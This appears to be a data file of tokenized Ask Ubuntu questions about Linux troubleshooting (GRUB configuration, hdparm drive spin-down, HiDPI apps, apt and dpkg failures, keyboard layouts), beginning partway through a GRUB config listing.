recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=0 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 0 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 45,51,53 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { menuentry 'ubuntu , with linux 3.13.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-advanced-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-recovery-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'ubuntu 14.04 lts ( 14.04 ) ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro splash quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } submenu 'advanced options for ubuntu 14.04 lts ( 14.04 ) ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' $ menuentry_id_option 'osprober-gnulinux-advanced-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { menuentry 'ubuntu ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-29-generic.efi.signed -- ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro splash quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-29-generic.efi.signed -- ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro splash quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( recovery mode ) ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-29-generic.efi.signed-root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset splash quiet-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset splash quiet initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic.efi.signed -- ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro splash quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ( on /dev/mapper/isw_beaaegcdjh_asus_os2 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic.efi.signed-root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset splash quiet-ed6b32bc-ec1d-444c-a000-282fddd6d460 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 else search -- no-floppy -- fs-uuid -- set=root ed6b32bc-ec1d-444c-a000-282fddd6d460 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=ed6b32bc-ec1d-444c-a000-282fddd6d460 ro recovery nomodeset splash quiet initrd /boot/initrd.img-3.13.0-24-generic } } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry 'system setup ' $ menuentry_id_option 'uefi-firmware ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
482652	how to stop applications without focus from opening popup windows	sometimes when one is using any app , almost at the moment when one is going to click or push key `` enter '' , a window appears in a `` pop-up style '' related to another app ( example : dialog of updates ) and with all the momentum in the fingers , one finishes pushing `` accept '' over the popup window and not the planned app . most cases are not critical , but they can consume some of time . is there some home-made or professional solution for this ?
482653	changing drive nodes & hdparm	i am currently attempting to create a command that works at startup to kill the power on two of my very noisy hard drives . i have edited the etc/rc.local file to include this command : sudo hdparm -y /dev/sdc sudo hdparm -y /dev/sdd exit 0 while i think this should work , it seems the allocated drives keep switching around every time i reboot . i have sda , sdb , sdc , sdd , and sde but they keep getting jumbled around ( making the drive i wish to shut different than sdd which is making the task of shutting down the right drive on start-up quite cumbersome . i had a perfectly functioning ftstab file working which disappeard , but i restored it from the back up into the etc/ dir : # < file system > < mount point > < type > < options > < dump > < pass > # entry for /dev/sda1 : uuid=43c09daf-08a5-44f2-89b0-fc7c6f0d1e67 / ext4 errors=remount-ro 0 1 # entry for /dev/sdd1 : uuid=443afbad7fe50945 /media/dx100 ntfs-3g defaults , nosuid , nodev , locale=en_ca.utf-8 0 0 # entry for /dev/sdb1 : uuid=fce456f5e456b21e /media/galaxym83 ntfs-3g defaults , nosuid , nodev , locale=en_ca.utf-8 0 0 # entry for /dev/sdf1 : uuid=1ca057fda057dbb8 /media/holideck ntfs-3g defaults , nosuid , nodev , locale=en_ca.utf-8 0 0 # entry for /dev/sdc1 : uuid=7abb49654b799d40 /media/jx3p ntfs defaults , nosuid , nodev , locale=en_ca.utf-8 0 0 it seems every time i boot the order of the drives changes . i do not know how to resolve this . a quick workaround the problem was to go with uuid instead of the dev letter by editing the etc/rc.local file to include : hdparm -y /dev/disk/by-uuid/443afbad7fe50945 hdparm -y /dev/disk/by-uuid/7abb49654b799d40 so i thought i was in the clear , as i heard both hard drives die down during the boot sequence , but , as soon as i log in both drives start up again ! so now i have to figure out what is making them start up again after log in , or perhaps another way to get them to turn off . is there some kind of command i can get to execute after log in ? i tried editing the startup applications to include an autossh with : autoshh - sudo hdparm -y /dev/disk/by-uuid/7abb49654b799d40 autoshh - sudo hdparm -y /dev/disk/by-uuid/443afbad7fe50945 but this did not seem to work to turn off the disks after log in .
482654	how to enable the mirror displays checkbox.it always disabled	who can help me and what information could i give ?
482655	third party applications on hidpi display	i noticed that some apps ( google chrome , viber , vkaudiosaver ) have problems with hidpi dispays ( everithing is too small ) . other apps work nice . strange thing is that cromium works good ( with some issues https : //code.google.com/p/chromium/issues/detail ? id=143619 ) and chrome does not . is there a way to fix it ?
482657	can not install teamviewer	install ububtu desktop 14.04 x64 with default user systemadmin but now root is not able to go inside /home/systemadmin folder
482660	after ldap and pam installation i can not log in my computer	after ldap ( server ) and pam ( client ) installation i can not log with my user or my root in my computer . maybe i configured wrong in pam . but i know password for root and ldap admin . after reboot i can not log anything in my computer . have you idea ? ubuntu 13.10
482665	why in source.list we must set distro name version ?	i ca n't understand why things like this still exists ? deb /ubuntu raring| main i mean any developer know that redundancy makes more mistakes and harder for maintain . why we ca n't just put url here and thats it ? distro know which version it is without explicit mention . why just impossible use distro name implicit if it not set ? the same for `` deb '' ? also distro upgrade became really easy thing just have to change distro name in one place without magic with awk and sed for whole source.list.d
482666	got stuck with router set-up asus rt-n10p	i 've had perfectly tuned router , but it broke up a couple of days ago . i 've setup network connection via pppoeconf , but today i 've bought a new router and totally unable to enter it 's administration console . pon is telling me that : /usr/sbin/pppd : in file /etc/ppp/peers/provider : unrecognized option '/dev/modem' that 's all . i do n't know what to do at all
482667	username vanished at login screen	i made a partition to use from both mac os x lion and ubuntu studio 14.04 . i used the method described in the second answer here to change the uid in ubuntu to 501 . i also changed the uid_min value in /etc/login.defs . nonetheless , my user name does n't show in the login screen any more . even if i change the uid back to 1000 , it wo n't reappear . how do i get it back ?
482670	missing separator in makefile	i have next code in makefile : cflags=-wall -g clean : rm -f ex1 when i run `` make clean '' i receive next error : makefile:4 : * missing separator . stop . why ? how i can fix it ?
482671	dell inspiron 1100 15 '' laptop with no os	how do i install ubuntu on a dell inspiron 1100 15 '' laptop with no preloaded os ?
482672	package management fails in update-manager with gzip problems and compilation errors . u12.04lts	similar to but not the same as package management system corrupted . can not install or remove packages . u12.04lts ( an earlier problem ) with package management system . followed all of l. d. james suggestions in his answer to no avail . this time as well as the gzip error i am also getting compilation errors . the difference may be due to a lack of compilation in my earlier problem so it may be the same error . the packages concerned are enumerated in the output from update-manager below . also included below that is the output from apt-get -f install apt-get autoremove gives same output . tried update without ssl updates - 9 to install and got `` unhandled error in aptdaemon '' . output number 3 below . one at a time - output 4 - is for firefox , first in the list of packages . falls over at libssl1.0.0 despite deselection of it from update ... tried apt-get install -- reinstall dpkg which succeeded , apt-get install -- reinstall tar and apt-get install -- reinstall gzip both of which failed at libssl1.0.0 as ever . ( as suggested by subv3rsion elsewhere in this forum ) now can not apt-get update with complete success even after changing server and apt-get clean - output number 5 below ... dpkg -l shows gzip = 1.4-1ubuntu2 , libssl1.0.0 = 1.0.1-4ubuntu5.15 and openssl =1.0.1-4ubuntu5.14 1 ) . output from update-manager the following packages will be upgraded : < > firefox firefox-globalmenu firefox-locale-en libavcodec-extra-53 libavformat53 libavutil-extra-51 libjson0 libpostproc52 libssl1.0.0 libswscale2 openssl 11 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade. < br > need to get 0 b/46.5 mb of archives . after this operation , 1,416 kb of additional disk space will be used. < br > do you want to continue [ y/n ] ? y debconf : perl may be unconfigured ( bareword `` gensym '' not allowed while `` strict subs '' in use at /usr/lib/perl/5.14/io/handle.pm line 67 . begin not safe after errors -- compilation aborted at /usr/lib/perl/5.14/io/handle.pm line 366 . compilation failed in require at /usr/lib/perl/5.14/io/seekable.pm line 9 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/seekable.pm line 9 . compilation failed in require at /usr/lib/perl/5.14/io/file.pm line 11 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/file.pm line 11 . compilation failed in require at /usr/share/perl/5.14/filehandle.pm line 9 . compilation failed in require at ( eval 1 ) line 3 . begin failed -- compilation aborted at ( eval 1 ) line 3. ) -- aborting ( reading database ... 160575 files and directories currently installed . ) preparing to replace libssl1.0.0 1.0.1-4ubuntu5.14 ( using ... /libssl1.0.0_1.0.1-4ubuntu5.15_i386.deb ) ... unpacking replacement libssl1.0.0 ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:4 > : data error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.15_i386.deb ( -- unpack ) : < br > subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because maxreports has already been reached bareword `` gensym '' not allowed while `` strict subs '' in use at /usr/lib/perl/5.14/io/handle.pm line 67 . begin not safe after errors -- compilation aborted at /usr/lib/perl/5.14/io/handle.pm line 366 . compilation failed in require at /usr/lib/perl/5.14/io/seekable.pm line 9 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/seekable.pm line 9 . compilation failed in require at /usr/lib/perl/5.14/io/file.pm line 11 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/file.pm line 11 . compilation failed in require at /usr/share/perl/5.14/filehandle.pm line 9 . compilation failed in require at /usr/share/perl5/debconf/template.pm line 8 . begin failed -- compilation aborted at /usr/share/perl5/debconf/template.pm line 8 . compilation failed in require at /usr/share/perl5/debconf/question.pm line 8 . begin failed -- compilation aborted at /usr/share/perl5/debconf/question.pm line 8 . compilation failed in require at /usr/share/perl5/debconf/config.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/config.pm line 7 . compilation failed in require at /usr/share/perl5/debconf/log.pm line 10 . compilation failed in require at /usr/share/perl5/debconf/db.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/db.pm line 7 . compilation failed in require at /usr/share/debconf/frontend line 6 . begin failed -- compilation aborted at /usr/share/debconf/frontend line 6. dpkg : error whale cleanang up : subprgcess installed post-installation script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.15_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 2 ) . output from install -f harveyp @ harveyp : ~ $ sudo apt-get -f install [ sudo ] password for harveyp : reading package lists ... done building dependency tree reading state information ... done 0 to upgrade , 0 to newly install , 0 to remove and 11 not to upgrade . 1 not fully installed or removed. < br > after this operation , 0 b of additional disk space will be used . e : internal error , no file name for libssl1.0.0 3 ) . unhandled error from aptdaemon traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1045 , in _simulate trans.unauthenticated = self.__simulate ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1160 , in __simulate unauthenticated = self._get_unauthenticated ( ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 347 , in _get_unauthenticated for pkg in self._iterate_packages ( ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1356 , in _iterate_packages for enum , pkg in enumerate ( self._cache ) : file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 216 , in __iter__ yield self [ pkgname ] file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 201 , in __getitem__ pkg = self._weakref [ key ] = package ( self , self._cache [ key ] ) keyerror : 'librqrcode-rubq-doc 4 ) . output from update of firefox installarchives ( ) failed : error in function : < setting up libssl1.0.0 ( 1.0.1-4ubuntu5.14 ) ... bareword `` gensym '' not allowed while `` strict subs '' in use at /usr/lib/perl/5.14/io/handle.pm line 67 . begin not safe after errors -- compilation aborted at /usr/lib/perl/5.14/io/handle.pm line 366 . compilation failed in require at /usr/lib/perl/5.14/io/seekable.pm line 9 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/seekable.pm line 9 . compilation failed in require at /usr/lib/perl/5.14/io/file.pm line 11 . begin failed -- compilation aborted at /usr/lib/perl/5.14/io/file.pm line 11 . compilation failed in require at /usr/share/perl/5.14/filehandle.pm line 9 . compilation failed in require at /usr/share/perl5/debconf/template.pm line 8 . begin failed -- compilation aborted at /usr/share/perl5/debconf/template.pm line 8 . compilation failed in require at /usr/share/perl5/debconf/question.pm line 8 . begin failed -- compilation aborted at /usr/share/perl5/debconf/question.pm line 8 . compilation failed in require at /usr/share/perl5/debconf/config.pm line 7 . begin failed -- compilation aborted at /usr/share/perl5/debconf/config.pm line 7 . compilation failed in require at /usr/share/perl5/debconf/log.pm line 10 . 5. output from apt-get update ... snip ... hit http : //ubuntu-archive.mirrors.free.org precise-security/multiverse translation-en hit http : //ubuntu-archive.mirrors.free.org precise-security/restricted translation-en hit http : //ubuntu-archive.mirrors.free.org precise-security/universe translation-en fetched 368 kb in 6s ( 59.5 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/ubuntu-archive.mirrors.free.org_ubuntu_dists_precise_universe_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . update the problem went away for a while after clean/check/check -f/remove/autoremove/remove -f/autoremove -f/ which i now practise superstitiously . however the problem has come back . the hash sum mismatch persists even after sudo rm /var/lib/apt/lists/* -vf . the error now reads ... reading package lists ... error ! e : problem parsing dependency depends e : error occurred while processing language-pack-ml-base ( newversion2 ) e : problem with mergelist /var/lib/apt/lists/ubuntu-archive.mirrors.free.org_ubuntu_dists_precise-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . this was one of the two packages selected for update by update-manager today as suggested by john s summers in this post i tried the rm several times and finally cleared update-manager . but the hash sum problem persists in update , so i expect to be here again soon ... update the hash sum problem still persists and update-manager continues to fall over , but i have taken to doing the updates one at a time and when the error occurs i do sudo apt-get install -- reinstall failed_package which restore the update-manager for the next update . it is very tedious but less so than having a broken update system ...
482677	bcm4331 causes graphics to fail on macbook pro 10,1	i just installed a fresh ubuntu 14.04 tls installation on my mac using refind since my last installation did not work . when i install ubuntu , the wireless does not work . but installing the bcm43xx drivers causes my screen to constant flicker . i think i really have the wrong drivers . this is the result after executing lspci : ricardo @ ubuntu : ~ $ lspci -vvnn | grep 14e4 03:00.0 ethernet controller [ 0200 ] : broadcom corporation device [ 14e4:16a3 ] ( rev10 ) subsystem : broadcom corporation device [ 14e4:16b4 ] 03:00.1 sd host controller [ 0805 ] : broadcom corporation bcm57765/57785 sdxc/mmc card reader [ 14e4:16bc ] ( rev 10 ) ( prog-if 01 ) subsystem : broadcom corporation device [ 14e4:96bc ] 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) could somebody advice me in my quest to get my wireless working without my screen to flicker ? edit : i did some things since my post . a quick coverage : i followed the guide earlier in my post resulting in a working wireless but with flickering screen . then i did opening additional drivers and installed the latest ( nvidia gk107m ) [ 650m mac edition ] also installed the suggested broadcom drivers . it seem to work now , but sometimes i get a panic at boot resulting in rebooting twice before i can re-use ubuntu . small issue left apart from the panics : i only can set the resolution 2880 x 1800 . anyway to get smaller resolutions ?
482678	how to add a new keyboard layout ( custom keyboard layout definition )	i want to copy a keyboard layout in /usr/share/x11/xkb/symbols/ and change it and then produce a new layout from it . how can i add a new keyboard layout ( named e.g . `` mylayout '' ) ? update # 1 : files i changed to add a new layout : /usr/share/x11/xkb/symbols/irwinxp ( originally the same as ir ) : // iranian keyboard layout //////////////////////////////////////// // persian layout , // based on // information technology – layout of persian letters and symbols on computer keyboards // isiri 9147 – 1st edition // institute of standards and industrial research of iran // http : //www.isiri.org/userstd/downloadstd.aspx ? id=9147 // http : //behnam.esfahbod.info/standards/isiri-keyboard-9147.pdf // // author : behnam esfahbod < behnam @ esfahbod.info > // default partial alphanumeric_keys xkb_symbols `` pes '' { name [ group1 ] = `` persian '' ; include `` ir ( pes_part_basic ) '' include `` ir ( pes_part_ext ) '' include `` nbsp ( zwnj2nb3nnb4 ) '' include `` level3 ( ralt_switch ) '' } ; partial alphanumeric_keys xkb_symbols `` pes_keypad '' { name [ group1 ] = `` persian ( with persian keypad ) '' ; include `` ir ( pes_part_basic ) '' include `` ir ( pes_part_keypad ) '' include `` nbsp ( zwnj2nb3nnb4 ) '' include `` level3 ( ralt_switch ) '' } ; partial hidden alphanumeric_keys xkb_symbols `` pes_part_basic '' { // persian digits key < ae01 > { [ farsi_1 , exclam , grave ] } ; key < ae02 > { [ farsi_2 , 0x100066c , at ] } ; key < ae03 > { [ farsi_3 , 0x100066b , numbersign ] } ; key < ae04 > { [ farsi_4 , 0x100fdfc , dollar ] } ; key < ae05 > { [ farsi_5 , 0x100066a , percent ] } ; key < ae06 > { [ farsi_6 , multiply , asciicircum ] } ; key < ae07 > { [ farsi_7 , arabic_comma , ampersand ] } ; key < ae08 > { [ farsi_8 , asterisk , enfilledcircbullet ] } ; key < ae09 > { [ farsi_9 , parenright , 0x100200e ] } ; key < ae10 > { [ farsi_0 , parenleft , 0x100200f ] } ; // persian letters and symbols key < ad01 > { [ arabic_dad , arabic_fathatan , degree ] } ; // 2 : arabic_sukun key < ad02 > { [ arabic_sad , arabic_dammatan , voidsymbol ] } ; // 2 : arabic_dammatan key < ad03 > { [ arabic_theh , arabic_kasratan , 0x13a4 ] } ; // 2 : arabic_kasratan key < ad04 > { [ arabic_qaf , arabic_fathatan , voidsymbol ] } ; key < ad05 > { [ arabic_feh , arabic_comma , voidsymbol ] } ; // 2 : arabic_damma key < ad06 > { [ arabic_ghain , arabic_semicolon , voidsymbol ] } ; // 2 : arabic_kasra key < ad07 > { [ arabic_ain , arabic_fatha , voidsymbol ] } ; key < ad08 > { [ arabic_heh , arabic_hamza_above , 0x100202d ] } ; // 2 : arabic_shadda key < ad09 > { [ arabic_khah , bracketright , 0x100202e ] } ; key < ad10 > { [ arabic_hah , bracketleft , 0x100202c ] } ; key < ad11 > { [ arabic_jeem , braceright , 0x100202a ] } ; key < ad12 > { [ arabic_tcheh , braceleft , 0x100202b ] } ; key < ac01 > { [ arabic_sheen , arabic_fatha , voidsymbol ] } ; // 2 : arabic_hamzaonwaw key < ac02 > { [ arabic_seen , arabic_damma , voidsymbol ] } ; // 2 : arabic_hamzaonyeh key < ac03 > { [ farsi_yeh , arabic_kasra , arabic_alefmaksura ] } ; // 2 : arabic_yeh key < ac04 > { [ arabic_beh , arabic_shadda , voidsymbol ] } ; // 1 : arabic_hamzaunderalef key < ac05 > { [ arabic_lam , 0x10006c0 , voidsymbol ] } ; // 2 : arabic_hamzaonalef key < ac06 > { [ arabic_alef , arabic_maddaonalef , 0x1000671 ] } ; key < ac07 > { [ arabic_teh , arabic_tehmarbuta , voidsymbol ] } ; key < ac08 > { [ arabic_noon , guillemotright , 0x100fd3e ] } ; key < ac09 > { [ arabic_meem , guillemotleft , 0x100fd3f ] } ; key < ac10 > { [ arabic_keheh , colon , semicolon ] } ; key < ac11 > { [ arabic_gaf , quotedbl , quotedbl ] } ; // 2 : arabic_semicolon key < ab01 > { [ arabic_zah , arabic_kaf , voidsymbol ] } ; key < ab02 > { [ arabic_tah , 0x1000653 , voidsymbol ] } ; key < ab03 > { [ arabic_zain , arabic_jeh , voidsymbol ] } ; key < ab04 > { [ arabic_ra , arabic_hamzaonwaw ,0x1000656 ] } ; // 2 : arabic_superscript_alef ٰ key < ab05 > { [ arabic_thal , 0x100200c , 0x100200d ] } ; key < ab06 > { [ arabic_dal , arabic_hamza_above , arabic_hamza_below ] } ; key < ab07 > { [ arabic_hamzaonyeh , 